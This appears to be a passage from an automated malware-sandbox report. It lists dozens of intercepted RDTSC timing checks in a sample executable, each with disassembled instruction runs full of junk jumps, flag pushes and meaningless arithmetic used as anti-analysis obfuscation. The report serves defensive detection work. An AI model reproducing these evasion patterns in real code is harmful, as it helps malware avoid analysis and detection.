Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD04F7 second address: 6DD04FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD04FB second address: 6DD0596 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E5482Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e pushad 0x0000000f movzx eax, di 0x00000012 popad 0x00000013 mov dword ptr [esi+08h], eax 0x00000016 jmp 00007F7B98E54835h 0x0000001b mov dword ptr [esi+0Ch], eax 0x0000001e pushad 0x0000001f pushad 0x00000020 call 00007F7B98E5482Ah 0x00000025 pop esi 0x00000026 pushfd 0x00000027 jmp 00007F7B98E5482Bh 0x0000002c adc esi, 501EAF7Eh 0x00000032 jmp 00007F7B98E54839h 0x00000037 popfd 0x00000038 popad 0x00000039 pushfd 0x0000003a jmp 00007F7B98E54830h 0x0000003f or cx, 0A78h 0x00000044 jmp 00007F7B98E5482Bh 0x00000049 popfd 0x0000004a popad 0x0000004b mov eax, dword ptr [ebx+4Ch] 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 movzx ecx, dx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0596 second address: 6DD0652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx ecx, bx 0x00000007 popad 0x00000008 mov dword ptr [esi+10h], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F7B9916151Bh 0x00000012 or ah, FFFFFFEEh 0x00000015 jmp 00007F7B99161529h 0x0000001a popfd 0x0000001b jmp 00007F7B99161520h 0x00000020 popad 0x00000021 mov eax, dword ptr [ebx+50h] 0x00000024 pushad 0x00000025 push eax 0x00000026 mov ah, bl 0x00000028 pop esi 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F7B99161525h 0x00000030 jmp 00007F7B9916151Bh 0x00000035 popfd 0x00000036 pushad 0x00000037 popad 0x00000038 popad 0x00000039 popad 0x0000003a mov dword ptr [esi+14h], eax 0x0000003d jmp 00007F7B99161524h 0x00000042 mov eax, dword ptr [ebx+54h] 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007F7B9916151Eh 0x0000004c or si, 6E58h 0x00000051 jmp 00007F7B9916151Bh 0x00000056 popfd 0x00000057 pushad 0x00000058 mov cl, 21h 0x0000005a popad 0x0000005b popad 0x0000005c mov dword ptr [esi+18h], eax 0x0000005f pushad 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0652 second address: 6DD0682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dx, cx 0x00000008 popad 0x00000009 mov eax, dword ptr [ebx+58h] 0x0000000c jmp 00007F7B98E5482Eh 0x00000011 mov dword ptr [esi+1Ch], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F7B98E5482Dh 0x0000001c mov edi, ecx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0682 second address: 6DD06DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+5Ch] 0x0000000c pushad 0x0000000d mov dh, al 0x0000000f pushfd 0x00000010 jmp 00007F7B99161529h 0x00000015 xor ch, 00000066h 0x00000018 jmp 00007F7B99161521h 0x0000001d popfd 0x0000001e popad 0x0000001f mov dword ptr [esi+20h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F7B9916151Dh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD06DB second address: 6DD0723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54831h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+60h] 0x0000000c pushad 0x0000000d mov si, bx 0x00000010 popad 0x00000011 mov dword ptr [esi+24h], eax 0x00000014 pushad 0x00000015 call 00007F7B98E5482Bh 0x0000001a mov si, 635Fh 0x0000001e pop esi 0x0000001f call 00007F7B98E54835h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0723 second address: 6DD07E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [ebx+64h] 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F7B99161523h 0x00000010 adc si, E20Eh 0x00000015 jmp 00007F7B99161529h 0x0000001a popfd 0x0000001b push esi 0x0000001c mov dx, 5322h 0x00000020 pop ebx 0x00000021 popad 0x00000022 mov dword ptr [esi+28h], eax 0x00000025 pushad 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F7B99161522h 0x0000002d xor al, FFFFFFB8h 0x00000030 jmp 00007F7B9916151Bh 0x00000035 popfd 0x00000036 mov bl, cl 0x00000038 popad 0x00000039 mov dl, D2h 0x0000003b popad 0x0000003c mov eax, dword ptr [ebx+68h] 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F7B9916151Ah 0x00000046 add si, C618h 0x0000004b jmp 00007F7B9916151Bh 0x00000050 popfd 0x00000051 pushfd 0x00000052 jmp 00007F7B99161528h 0x00000057 xor cx, 3078h 0x0000005c jmp 00007F7B9916151Bh 0x00000061 popfd 0x00000062 popad 0x00000063 mov dword ptr [esi+2Ch], eax 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD07E8 second address: 6DD07EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD07EC second address: 6DD07F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD07F0 second address: 6DD07F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD07F6 second address: 6DD0878 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+6Ch] 0x0000000d jmp 00007F7B99161520h 0x00000012 mov word ptr [esi+30h], ax 0x00000016 pushad 0x00000017 movzx esi, bx 0x0000001a pushfd 0x0000001b jmp 00007F7B99161523h 0x00000020 jmp 00007F7B99161523h 0x00000025 popfd 0x00000026 popad 0x00000027 mov ax, word ptr [ebx+00000088h] 0x0000002e jmp 00007F7B99161526h 0x00000033 mov word ptr [esi+32h], ax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F7B9916151Ah 0x00000040 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0878 second address: 6DD0887 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E5482Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0887 second address: 6DD089F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B99161524h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD089F second address: 6DD08A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD08A3 second address: 6DD0915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+0000008Ch] 0x0000000e jmp 00007F7B99161527h 0x00000013 mov dword ptr [esi+34h], eax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F7B99161524h 0x0000001d add ecx, 0AD6A5E8h 0x00000023 jmp 00007F7B9916151Bh 0x00000028 popfd 0x00000029 jmp 00007F7B99161528h 0x0000002e popad 0x0000002f mov eax, dword ptr [ebx+18h] 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0915 second address: 6DD0919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0919 second address: 6DD091F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD091F second address: 6DD09C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 mov ecx, 01396A8Dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esi+38h], eax 0x00000011 jmp 00007F7B98E54838h 0x00000016 mov eax, dword ptr [ebx+1Ch] 0x00000019 jmp 00007F7B98E54830h 0x0000001e mov dword ptr [esi+3Ch], eax 0x00000021 pushad 0x00000022 call 00007F7B98E5482Eh 0x00000027 jmp 00007F7B98E54832h 0x0000002c pop ecx 0x0000002d call 00007F7B98E5482Bh 0x00000032 jmp 00007F7B98E54838h 0x00000037 pop ecx 0x00000038 popad 0x00000039 mov eax, dword ptr [ebx+20h] 0x0000003c pushad 0x0000003d call 00007F7B98E54837h 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD09C2 second address: 6DD09CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 movsx ebx, si 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD09CC second address: 6DD0A0C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7B98E5482Eh 0x00000008 sub esi, 494D2758h 0x0000000e jmp 00007F7B98E5482Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [esi+40h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F7B98E54835h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0A0C second address: 6DD0A12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0A12 second address: 6DD0A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0A16 second address: 6DD0A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+00000080h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7B99161522h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0A38 second address: 6DD0A5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, B1h 0x00000005 mov cx, 12A9h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push 00000001h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F7B98E54831h 0x00000016 pop esi 0x00000017 mov ah, bl 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0A5E second address: 6DD0ADC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7B99161529h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F7B99161521h 0x0000000f xor ecx, 35BDA9C6h 0x00000015 jmp 00007F7B99161521h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e nop 0x0000001f jmp 00007F7B9916151Eh 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F7B9916151Ch 0x0000002e sbb ax, B598h 0x00000033 jmp 00007F7B9916151Bh 0x00000038 popfd 0x00000039 mov ah, 4Fh 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0ADC second address: 6DD0AF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B98E54831h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0AF1 second address: 6DD0B19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F7B9916151Dh 0x0000000e lea eax, dword ptr [ebp-10h] 0x00000011 pushad 0x00000012 call 00007F7B9916151Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0B19 second address: 6DD0B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 jmp 00007F7B98E5482Ah 0x0000000c push eax 0x0000000d jmp 00007F7B98E5482Bh 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F7B98E54835h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0BAA second address: 6DD0BD9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7B99161522h 0x00000008 xor cl, 00000008h 0x0000000b jmp 00007F7B9916151Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 test edi, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0BD9 second address: 6DD0BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0BDD second address: 6DD0BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0BE3 second address: 6DD0C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B98E54839h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0C00 second address: 6DD0C28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F7C085CFFC2h 0x00000011 pushad 0x00000012 push eax 0x00000013 mov ebx, 55D9115Eh 0x00000018 pop ebx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0C28 second address: 6DD0C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, dx 0x00000007 popad 0x00000008 popad 0x00000009 mov eax, dword ptr [ebp-0Ch] 0x0000000c pushad 0x0000000d push edx 0x0000000e mov bx, si 0x00000011 pop esi 0x00000012 movsx ebx, ax 0x00000015 popad 0x00000016 mov dword ptr [esi+04h], eax 0x00000019 pushad 0x0000001a mov cx, 4435h 0x0000001e call 00007F7B98E54832h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0C5A second address: 6DD0C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 lea eax, dword ptr [ebx+78h] 0x00000009 jmp 00007F7B99161527h 0x0000000e push 00000001h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0C82 second address: 6DD0C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0C86 second address: 6DD0C8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0C8C second address: 6DD0CA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B98E54839h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0CA9 second address: 6DD0CD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F7B9916151Eh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov esi, 338D9D43h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0D84 second address: 6DD0D8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0D8A second address: 6DD0D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0D8E second address: 6DD0D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0D92 second address: 6DD0DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0DA2 second address: 6DD0DA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0DA6 second address: 6DD0DBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161525h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC09EE second address: 6DC09F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC09F2 second address: 6DC0A4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54833h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F7B98E54832h 0x00000015 xor ecx, 50CF4D48h 0x0000001b jmp 00007F7B98E5482Bh 0x00000020 popfd 0x00000021 jmp 00007F7B98E54838h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC0A4D second address: 6DC0A7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F7B99161526h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC0A7B second address: 6DC0A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC0A7F second address: 6DC0A85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC0A85 second address: 6DC0AC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, cl 0x00000005 mov bl, F0h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+04h] 0x0000000d pushad 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F7B98E54832h 0x00000015 adc ah, FFFFFF98h 0x00000018 jmp 00007F7B98E5482Bh 0x0000001d popfd 0x0000001e movzx eax, di 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 call 00007F7B98E5482Bh 0x00000029 pop eax 0x0000002a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC0AC8 second address: 6DC0AE4 instructions: 0x00000000 rdtsc 0x00000002 mov di, 010Ch 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7B9916151Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC0AE4 second address: 6DC0B0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E5482Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7B98E54835h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC0B45 second address: 6DC0B4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC0B4B second address: 6DC0B4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E309F7 second address: 6E30A68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7B99161523h 0x00000008 pushfd 0x00000009 jmp 00007F7B99161528h 0x0000000e xor esi, 0EAF6408h 0x00000014 jmp 00007F7B9916151Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d je 00007F7C096A6CCDh 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F7B99161522h 0x0000002c add ax, 8668h 0x00000031 jmp 00007F7B9916151Bh 0x00000036 popfd 0x00000037 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E30A68 second address: 6E30A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, dx 0x00000007 popad 0x00000008 mov ecx, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov bh, 39h 0x00000012 jmp 00007F7B98E54834h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E30A8F second address: 6E30ADD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7B99161521h 0x00000009 adc esi, 20B709E6h 0x0000000f jmp 00007F7B99161521h 0x00000014 popfd 0x00000015 push esi 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a inc ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F7B99161529h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E10DDA second address: 6E10E28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F7B98E54833h 0x00000013 jmp 00007F7B98E54833h 0x00000018 popfd 0x00000019 mov ax, 633Fh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E10E28 second address: 6E10E6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7B9916151Bh 0x00000009 and cl, 0000000Eh 0x0000000c jmp 00007F7B99161529h 0x00000011 popfd 0x00000012 mov ah, E1h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007F7B9916151Ah 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 pop ebx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E10E6B second address: 6E10E96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov di, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F7B98E54836h 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E10E96 second address: 6E10E9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E10E9A second address: 6E10EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E204F9 second address: 6E20583 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop edi 0x0000000c mov eax, 610ACB03h 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 jmp 00007F7B99161526h 0x0000001b mov ebp, esp 0x0000001d jmp 00007F7B99161520h 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F7B9916151Eh 0x0000002a and al, 00000028h 0x0000002d jmp 00007F7B9916151Bh 0x00000032 popfd 0x00000033 mov edx, esi 0x00000035 popad 0x00000036 push eax 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a call 00007F7B99161521h 0x0000003f pop ecx 0x00000040 rdtsc
